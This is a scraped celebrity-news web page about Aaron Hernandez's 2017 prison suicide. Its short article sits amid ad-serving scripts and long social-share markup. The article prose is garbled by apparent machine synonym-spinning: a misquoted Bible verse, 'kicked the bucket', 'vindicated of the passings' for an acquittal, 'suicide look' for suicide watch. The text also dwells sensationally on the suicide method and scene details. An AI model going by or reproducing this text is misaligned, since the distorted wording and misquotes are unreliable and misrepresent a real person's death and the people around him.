<p><img class="aligncenter size-full wp-image-147100" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez2.png" alt="Aaron Hernandez2" width="726" height="626" srcset="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez2.png 726w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez2-300x259.png 300w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez2-696x600.png 696w, http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez2-487x420.png 487w" sizes="(max-width: 726px) 100vw, 726px" />There have been different reports that Aaron composed the Bible verse &#8220;John 3:16&#8221; in red marker over his brow. There was a Bible opened to a similar verse in Aaron&#8217;s cell The Daily Mail announced. The whole verse stated, &#8220;For God so cherished the world that he gave his unparalleled Son, that whoever trusts in him should not die but rather have everlasting life.&#8221; It was affirmed that Aaron supposedly left the suicide notes close to his Bible.</p>
<h2><strong><a href="http://www.thenewstrack.com/paulie-giganti-dead-hells-kitchen-star-shockingly-dies-at-36/">Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36</a></strong></h2>

 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_inline ">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<p>&#8220;Boss Medical Examiner Dr. Henry N. Nields played out a post-mortem on Mr. Hernandez on Wednesday and finished up today that the way of death was suicide and the cause asphyxia by hanging,&#8221; an announcement read from the Worcester District Attorney&#8217;s Office on Apr. 21. Agents had discovered &#8220;cardboard stuck into the entryway tracks of his single-prisoner cell to block section into the cell&#8221; and &#8220;there were no indications of a battle, and specialists established that Mr. Hernandez was distant from everyone else at the season of the hanging.&#8221; Just five days before he kicked the bucket, Aaron had been vindicated of the passings of Daniel de Abreu, 29, and Safiro Furtado, 28.</p>
<p>what do you think about these most recent improvements? Disclose to us your contemplations in the remarks beneath!</p>

<!-- Quick Adsense WordPress Plugin: http://quicksense.net/ -->
<div style="float:none;margin:10px 0 10px 0;text-align:center;">
<div id="SC_TBlock_226398" class="SC_TBlock">loading...</div> 
<script type="text/javascript">
  (sc_adv_out = window.sc_adv_out || []).push({
    id : "226398",
    domain : "n.ads3-adnow.com"
  });
</script>
<script type="text/javascript" src="//st-n.ads3-adnow.com/js/adv_out.js"></script>
<div class="kontextuaRT"></div>
</div>

<div style="font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both"></div><div class="essb_links essb_counters essb_counter_modern_right essb_displayed_bottom essb_share essb_template_copy-retina essb_1665603744 print-no" id="essb_displayed_bottom_1665603744" data-essb-postid="147097" data-essb-position="bottom" data-essb-button-style="icon" data-essb-template="copy-retina" data-essb-counter-pos="right" data-essb-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-twitter-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-instance="1665603744"><ul class="essb_links_list essb_force_hide_name essb_force_hide"><li class="essb_item essb_totalcount_item" data-counter-pos="right"><span class="essb_totalcount essb_t_l_big" title=""><span class="essb_t_nb"></span></span></li><li class="essb_item essb_link_facebook nolightbox"> <a href="http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;facebook&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb_window(&#39;https://twitter.com/intent/tweet?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/?p=147097&amp;counturl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;hashtags=&#39;,&#39;twitter&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;google&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href="#" title="" onclick="essb_pinterest_picker(&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;linkedin&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;stumbleupon&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;tumblr&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;reddit&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_love nolightbox"> <a href="#" title="" onclick="essb_lovethis(&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_more nolightbox"> <a href="#" title="" onclick="essb_toggle_more_popup(&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_whatsapp nolightbox essb_after_more"> <a href="whatsapp://send?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'whatsapp', '1665603744', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_blogger nolightbox essb_after_more"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;blogger&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_yahoomail nolightbox essb_after_more"> <a href="http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;yahoomail&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_sms nolightbox essb_after_more"> <a href="sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_window(&#39;sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097&#39;,&#39;sms&#39;,&#39;1665603744&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li><li class="essb_item essb_link_viber nolightbox essb_after_more"> <a href="viber://forward?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'viber', '1665603744', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name essb_noname"></span></a></li></ul></div><div class="essb_morepopup essb_morepopup_1665603744" style="display:none;"> <a href="#" class="essb_morepopup_close" onclick="essb_toggle_less_popup('1665603744'); return false;"></a> <div class="essb_morepopup_content essb_morepopup_content_1665603744"><div class="essb_links essb_displayed_more_popup essb_share essb_template_copy-retina essb_1689089863 essb_width_columns_3 print-no" id="essb_displayed_more_popup_1689089863" data-essb-postid="147097" data-essb-position="more_popup" data-essb-button-style="button" data-essb-template="copy-retina" data-essb-counter-pos="left" data-essb-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-twitter-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-essb-instance="1689089863"><ul class="essb_links_list"><li class="essb_item essb_link_facebook nolightbox"> <a href="http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.facebook.com/sharer/sharer.php?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;facebook&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Facebook</span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href="#" title="" onclick="essb_window(&#39;https://twitter.com/intent/tweet?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/?p=147097&amp;counturl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;hashtags=&#39;,&#39;twitter&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Twitter</span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;google&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Google+</span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href="#" title="" onclick="essb_pinterest_picker(&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Pinterest</span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;linkedin&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">LinkedIn</span></a></li><li class="essb_item essb_link_digg nolightbox"> <a href="http://digg.com/submit?phase=2amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://digg.com/submit?phase=2amp;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;digg&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Digg</span></a></li><li class="essb_item essb_link_del nolightbox"> <a href="https://delicious.com/save?v=5&noui&jump=close&url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://delicious.com/save?v=5&noui&jump=close&url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;del&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Del</span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.stumbleupon.com/badge/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;stumbleupon&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">StumbleUpon</span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;http://tumblr.com/share?s=&v=3&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;tumblr&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Tumblr</span></a></li><li class="essb_item essb_link_vk nolightbox"> <a href="http://vkontakte.ru/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://vkontakte.ru/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;vk&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">VKontakte</span></a></li><li class="essb_item essb_link_print nolightbox"> <a href="#" title="" onclick="essb_print(&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Print</span></a></li><li class="essb_item essb_link_mail nolightbox"> <a href="#" title="" onclick="essb_mailform_1689089863(&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Email</span></a></li><li class="essb_item essb_link_flattr nolightbox"> <a href="https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&title=Aaron%2BHernandez%2BWrote%2BSuicide%2BNote%2BTo%2BAlleged%2BGay%2BPrison%2BLover%2BBefore%2BDeath%2B%25E2%2580%2594%2BReport&description=Aaron+Hernandez+supposedly+composed+three+notes+before+he+conferred+suicide+in+his+jail+cell.+Presently%2C+a+stunning+new+report+asserts+that+one+was+routed+to+his+gay+sweetheart+who+is+said+to+be+under+suicide+look+as+more+subtle+elements+of+Aaron%27s+demise+are+uncovered.+Aaron+Hernandez+supposedly+composed+three+suicide+letters+that+were+found+in+his+correctional+facility+cell+after+he+hanged+himself+on+Apr.+19.+The+notes+were+purportedly+found+the+day+after+he+killed+himself+at+27+years+old+at+the+Souza+Baranowski+Correctional+Center.+He+was+serving+a+lifelong+incarceration+without+the+likelihood+of+parole+for+the+murder+of+Odin+Lloyd%2C+his+life+partner%27s+sister%27s+sweetheart.+Another+report+asserted+that+the+letters+were+routed+to+Aaron%27s+life+partner+Shayanna+Jenkins-Hernandez%2C+his+four-year+old+little+girl+Avielle%2C+and+his+%22gay+jailhouse+significant+other%2C%22+as+per+a+source+from+The+Daily+Mail.+Past+reports+said+that+one+letter+was+routed+to+general+society+and+the+others+were+for+particular+individuals.+&language=sq_AL&tags=Aaron+Hernandez%2CAaron+Hernandez+dead%2CCelebrity+News&hidden=0&category=text" title="" onclick="essb_window(&#39;https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&title=Aaron%2BHernandez%2BWrote%2BSuicide%2BNote%2BTo%2BAlleged%2BGay%2BPrison%2BLover%2BBefore%2BDeath%2B%25E2%2580%2594%2BReport&description=Aaron+Hernandez+supposedly+composed+three+notes+before+he+conferred+suicide+in+his+jail+cell.+Presently%2C+a+stunning+new+report+asserts+that+one+was+routed+to+his+gay+sweetheart+who+is+said+to+be+under+suicide+look+as+more+subtle+elements+of+Aaron%27s+demise+are+uncovered.+Aaron+Hernandez+supposedly+composed+three+suicide+letters+that+were+found+in+his+correctional+facility+cell+after+he+hanged+himself+on+Apr.+19.+The+notes+were+purportedly+found+the+day+after+he+killed+himself+at+27+years+old+at+the+Souza+Baranowski+Correctional+Center.+He+was+serving+a+lifelong+incarceration+without+the+likelihood+of+parole+for+the+murder+of+Odin+Lloyd%2C+his+life+partner%27s+sister%27s+sweetheart.+Another+report+asserted+that+the+letters+were+routed+to+Aaron%27s+life+partner+Shayanna+Jenkins-Hernandez%2C+his+four-year+old+little+girl+Avielle%2C+and+his+%22gay+jailhouse+significant+other%2C%22+as+per+a+source+from+The+Daily+Mail.+Past+reports+said+that+one+letter+was+routed+to+general+society+and+the+others+were+for+particular+individuals.+&language=sq_AL&tags=Aaron+Hernandez%2CAaron+Hernandez+dead%2CCelebrity+News&hidden=0&category=text&#39;,&#39;flattr&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Flattr</span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://reddit.com/submit?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;reddit&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Reddit</span></a></li><li class="essb_item essb_link_buffer nolightbox"> <a href="https://bufferapp.com/add?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&via=&picture=&count=horizontal&source=button" title="" onclick="essb_window(&#39;https://bufferapp.com/add?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&via=&picture=&count=horizontal&source=button&#39;,&#39;buffer&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Buffer</span></a></li><li class="essb_item essb_link_love nolightbox"> <a href="#" title="" onclick="essb_lovethis(&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Love This</span></a></li><li class="essb_item essb_link_weibo nolightbox"> <a href="http://service.weibo.com/share/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://service.weibo.com/share/share.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;weibo&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Weibo</span></a></li><li class="essb_item essb_link_pocket nolightbox"> <a href="https://getpocket.com/save?title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;https://getpocket.com/save?title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;pocket&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Pocket</span></a></li><li class="essb_item essb_link_xing nolightbox"> <a href="https://www.xing.com/social_plugins/share?h=1;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://www.xing.com/social_plugins/share?h=1;url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;xing&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Xing</span></a></li><li class="essb_item essb_link_ok nolightbox"> <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;ok&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Odnoklassniki</span></a></li><li class="essb_item essb_link_mwp nolightbox"> <a href="http://managewp.org/share/form?url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" title="" onclick="essb_window(&#39;http://managewp.org/share/form?url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#39;,&#39;mwp&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">ManageWP.org</span></a></li><li class="essb_item essb_link_whatsapp nolightbox"> <a href="whatsapp://send?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'whatsapp', '1689089863', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">WhatsApp</span></a></li><li class="essb_item essb_link_meneame nolightbox"> <a href="http://www.meneame.net/submit.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" 